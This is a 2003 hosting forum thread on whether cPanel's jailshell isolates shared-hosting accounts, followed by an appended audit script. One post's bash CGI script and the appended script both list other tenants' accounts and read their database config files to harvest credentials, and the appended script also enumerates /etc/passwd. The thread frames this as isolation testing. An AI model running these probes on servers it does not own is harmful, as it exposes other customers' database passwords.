The Community Forums


Shell Jail.. is it available in cPanel?

Discussion in 'General Discussion' started by SupermanInNY, Sep 22, 2003.

  1. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Hi all,

    I'm in the process of purchasing a new control panel and I'm checking cPanel, Plesk and Ensim.

    Ensim claim that they got the Pro version so tight that you cannot visit your neighbouring domains on the same server.

    Plesk have something called sandbox which is perhaps the very same thing.

    What about cPanel? How secure is cPanel in that sense?
    I've pushed away users who wanted to do e-commerce simply because I know (well... with Ensim 3.1, not the Pro) that I can see other accounts, and if I can see them... they can see me, and I don't have a towel with me (those who have read "The Hitchhiker's Guide to the Galaxy" will know what the towel is used for).

    I have a Linux guru who is working with me and who will do his best (and he is an expert in the field) to try to "snoop" around and find vulnerabilities in the system - no malicious acts, just find and report.

    Can anyone "donate" a regular account for testing to see if while using a shell account, it is possible to view other accounts on the same server?

    I need an account for a period of few days (size wise we only need about 50MB and bandwidth is a non-issue).

    Any takers?

    -Alon
    alon@wsco.com

  2. Angel78

    Angel78 Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    413
    Likes Received:
    1
    Trophy Points:
    16
    Jail Shell is available for SSH accounts in Cpanel.

    And sorry, but at least I won't give shell access to unknown persons. Perhaps you could ask cpaneljosh (nickname on board) to give you a test account, or email the cPanel people and ask for a 15-day try-out licence (and install it on your server).

    :)

  3. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Hi... and thanks for the reply.

    "...and sorry but at least I wont give Shell access to unknown persons".

    I plan on providing hosting services where I am going to give Shell accounts to every domain.

    I don't know who my customers are. For me they are all unknown persons, and therefore that is exactly the reason I'm looking to verify that the accounts are secure.

    I can transfer a domain to your site if that helps in anyway.
    Does it?

    Thanks for your help.

    -Alon.

  4. ljprevo

    ljprevo Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    My opinion only here, but I feel that if you did this you would be asking for trouble. I only give it to customers on a request basis, and only after I have called and talked to them on the phone.

    If you do this you have all those shell accounts hanging out there, ready for someone to try and exploit one of them. Not to mention that I would guess 75% of your customers will never use shell access.

  5. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    "I would guess 75% of your customers will never use shell access"

    That may be true, but in order for me to differentiate my service from other services, I offer a full-service account.

    I also make this appeal to students as a target audience. Science major students get Linux accounts at school, but are then missing out on the domain and email option.

    Yes.. I ask for trouble. No doubt. :).

    But, before I go out and put my self out and hang myself,.. I'm trying to find out if what I'm asking for is really that dangerous.

    And that is the reason I'm posting this thread. I want to find out if it is safe or not.

    I personally use the shell almost every day doing programming, enhancements and installs. I can't have an account without a shell.
    I expect that I'm not the only one with such a need.
    As it is today, I am careful not to leave loose ends, such as important info in the public area, but that is using Ensim 3.11, which is known to be unsafe.

    So,.. can anyone give me an account to tryout?
    I promise I'll share all the 'good' and 'bad' info about what I was able to pull with the provider (and only with the provider).


    Thanks,

    -Alon.
    alon@wsco.com

  6. ljprevo

    ljprevo Well-Known Member

    Joined:
    Apr 15, 2003
    Messages:
    67
    Likes Received:
    0
    Trophy Points:
    6
    I understand where you are coming from completely.

    I do budget hosting, so the importance of shell access is not really needed.

    I am not trying to dis you at all. I commend you for researching the dangers and how to avoid them before proceeding; there are a lot of hosts that don't, and open the flood gates for everyone.

    Why not

    shell access*

    * - certain conditions here.

    Don't turn it on for the regular job, just by request only.

    Something to think about.

  7. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    I'll definitely take it under advisement. But, in the event that I already am consenting to provide it, I need (not just want) to know the current vulnerabilities, at least be conscious of them, and perhaps alert prospective users to their caveats. The latter portion is designed specifically to avoid any risk of getting into a lawsuit should one customer get "hit" by some other customer.

    So again.. my call is to.. a n y o n e that would want to find out if that issue is handled or needs handling by cPanel.

    -Alon
    alon@wsco.com

  9. pirania1

    pirania1 Well-Known Member

    Joined:
    May 10, 2003
    Messages:
    126
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Miami, FL
    Why don't you get trial licence from Cpanel and try it on your machine?
    There are not many people here who would risk compromising their machine for an anonymous person.
    When someone orders the shell, we can always do fraud screening and have credit card on file to charge any costs of server restore.
    Understand.. Anyone can post here, so giving out shells to anonymous people is not the best thing to do.
    My advice is for you to get trial licence for cpanel and try it out.

  10. trakwebster

    trakwebster Well-Known Member

    Joined:
    Jan 29, 2003
    Messages:
    145
    Likes Received:
    0
    Trophy Points:
    16
    If it's not indiscreet, would you tell how you go about fraud screening? What steps do you take?

    I would be grateful to know.
     
  11. webmeister

    webmeister Member

    Joined:
    Aug 5, 2002
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    jail shell hell

    personally, i could NOT use a whm/cpanel account without some kind of shell access... the company where i get my reseller account was quick and kind to provide me with jailshell hell access... :cool: ... i'm a vnc fan used to running as root! jailshell hell is weak (to me) because of its security (good for you) ... it sux... but sure beats the crap out of NOT having it... the way i look at it regular backups are the solution... so IF you get a bad customer who takes advantage you can roll back... the whole point of computing is to FREE us from limitations, not limit us because of possible abuses... that's how commies and politicians work... let's just DO IT and fix the bugs as we go along... but i have only been programming full-time since 1975 using everything from toggle switches to 80 column punch cards on 10 different programming languages using everything from assembler to the ms visual crap and all the modern toys, so what do i know?

    of course when it comes to testing a system i usually just cough up the $20-$30 and test it... instead of spending days looking for a free account i just pay for one and if it's not any good ask for a good faith refund...

    8-D

  12. SupermanInNY

    SupermanInNY Well-Known Member

    Joined:
    Jul 19, 2003
    Messages:
    255
    Likes Received:
    0
    Trophy Points:
    16
    Folks, just try to place this in a test file and see if you get any info.

    name the file as test.cgi and place it in a cgi-bin directory, or the html directory.
    This is from an Ensim directory scheme, so you can modify the /home/virtual to the cPanel directory structure.

    I'm curious to know if anything pulls up.
    In Ensim, you get a listing of all the accounts on the server, and you can then even issue the grep command (as shown here), search for the key words, and run vi on those files that pull up.

    I'd like to know if this is something I can expect to see with cPanel as well (I hope not).

    -Alon.


    Code:
    #!/bin/bash
    # CGI probe: what can a script in one account's cgi-bin see on the server?
    # Paths follow Ensim's /home/virtual/siteNN/fst layout; adjust for cPanel's /home/<user>.
    
    # The header must be printed before any other output.
    echo "Content-Type: text/plain"
    echo
    
    # Which other accounts are visible at all?
    ls -ltr /home/virtual/
    
    # Host information that should arguably not be visible to a tenant.
    echo "cat /proc/cpuinfo"
    cat /proc/cpuinfo
    
    echo "cat /proc/meminfo"
    cat /proc/meminfo
    
    # Pull database settings out of other sites' config files.
    # (cat rather than vi: vi needs a terminal and hangs or fails under CGI.)
    #ls -ltr  /home/virtual/site12/fst/var/www/html/
    grep base /home/virtual/site12/fst/var/www/html/include/database.php
    cat /home/virtual/site16/fst/var/www/html/Connections/main.php
    grep db /home/virtual/site52/fst/var/www/html/config.php
    cat /home/virtual/site62/fst/var/www/html/db.php
    
     
    #12 SupermanInNY, Oct 6, 2003
    Last edited: Oct 6, 2003
  13. sly2k

    sly2k Registered

    Joined:
    Nov 12, 2003
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    from a jailshell in CPanel you can read /proc but you cannot see any other directories but your own in /home/

    you can read all the /etc files and everything, which I don't like much. That includes /etc/passwd, btw.
     
  14. Arthur

    Arthur Member

    Joined:
    Jan 23, 2003
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    Your script doesn't work if you enable suEXEC and webroot protection.
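Bringing the last three posts together: the script below is an added example, not code from this thread or from cPanel. It does for a cPanel-style layout what Alon's Ensim CGI does (list sibling accounts, read their database configs), and adds the two checks sly2k and Arthur raise: whether a readable /etc/passwd lets a tenant enumerate the other accounts, and which identity the script actually executes as. With suEXEC a CGI runs as the account owner, so it only sees what the jailshell user sees; without it, the CGI runs as the shared web-server user, which has to be able to read every vhost, and that is the hole webroot protection closes. The /home/<user>/public_html layout, the HOME_ROOT and PASSWD_FILE variables and the list of config file names are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not code from this thread or from cPanel: a read-only isolation
# probe for one shared-hosting account. Assumes a cPanel-style /home/<user>/public_html
# layout; HOME_ROOT and PASSWD_FILE are hypothetical knobs so the checks can be pointed
# at a constructed directory tree instead of the live server.
HOME_ROOT="${HOME_ROOT:-/home}"
PASSWD_FILE="${PASSWD_FILE:-/etc/passwd}"

# Identity the probe runs as. With suEXEC a CGI runs as the account owner; without it,
# it runs as the shared web-server user (nobody/apache), which can read every vhost.
probe_identity() {
    id -un
}

# Sibling home directories (other than $2) the caller can enter and list.
# A working jailshell shows none; a CGI running as the web-server user often shows all.
readable_sibling_homes() {
    root="$1"; me="$2"
    for d in "$root"/*/; do
        d=${d%/}; name=${d##*/}
        [ -d "$d" ] || continue
        [ "$name" = "$me" ] && continue
        if [ -r "$d" ] && [ -x "$d" ]; then
            echo "$name"
        fi
    done
    return 0
}

# Accounts (uid >= 1000) a tenant can enumerate when the passwd file is readable
# inside the jail: a ready-made target list for guessing other users' passwords.
enumerate_accounts() {
    awk -F: '$3 >= 1000 && $1 != "nobody" { print $1 }' "$1"
}

# Readable web-app config files under other tenants' public_html that mention
# database credentials. The file names are the usual suspects, not an exhaustive list.
scan_db_configs() {
    root="$1"; me="$2"
    for d in "$root"/*/; do
        d=${d%/}; name=${d##*/}
        [ "$name" = "$me" ] && continue
        [ -d "$d/public_html" ] || continue
        find "$d/public_html" -maxdepth 3 -type f \
            \( -name config.php -o -name db.php -o -name database.php \
               -o -name wp-config.php -o -name main.php \) 2>/dev/null |
        while IFS= read -r f; do
            if [ -r "$f" ] && grep -Eiq 'db_?(pass|user|name)|password' "$f"; then
                echo "$f"
            fi
        done
    done
    return 0
}

# Plain-text report; the Content-Type line makes the same script usable as a CGI.
report() {
    me=$(probe_identity)
    echo "Content-Type: text/plain"
    echo
    echo "running as: $me"
    echo "-- sibling homes I can enter (jailshell should list none):"
    readable_sibling_homes "$HOME_ROOT" "$me"
    echo "-- accounts enumerable from $PASSWD_FILE:"
    if [ -r "$PASSWD_FILE" ]; then enumerate_accounts "$PASSWD_FILE"; fi
    echo "-- other tenants' DB configs I can read (suEXEC + webroot protection should leave none):"
    scan_db_configs "$HOME_ROOT" "$me"
}

report
```

Run it twice: once from the jailshell (`sh probe.sh`) and once copied to cgi-bin as probe.cgi and fetched in a browser, then compare the "running as" lines and the file lists. If the jailshell run lists nothing but the CGI run reports nobody (or apache) and other tenants' config files, the jail is doing its job and the gap is on the suEXEC/webroot side, not the shell side. A long list under "accounts enumerable" is the /etc/passwd exposure sly2k describes; it does not leak password hashes, but it hands a tenant every login name on the box.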
     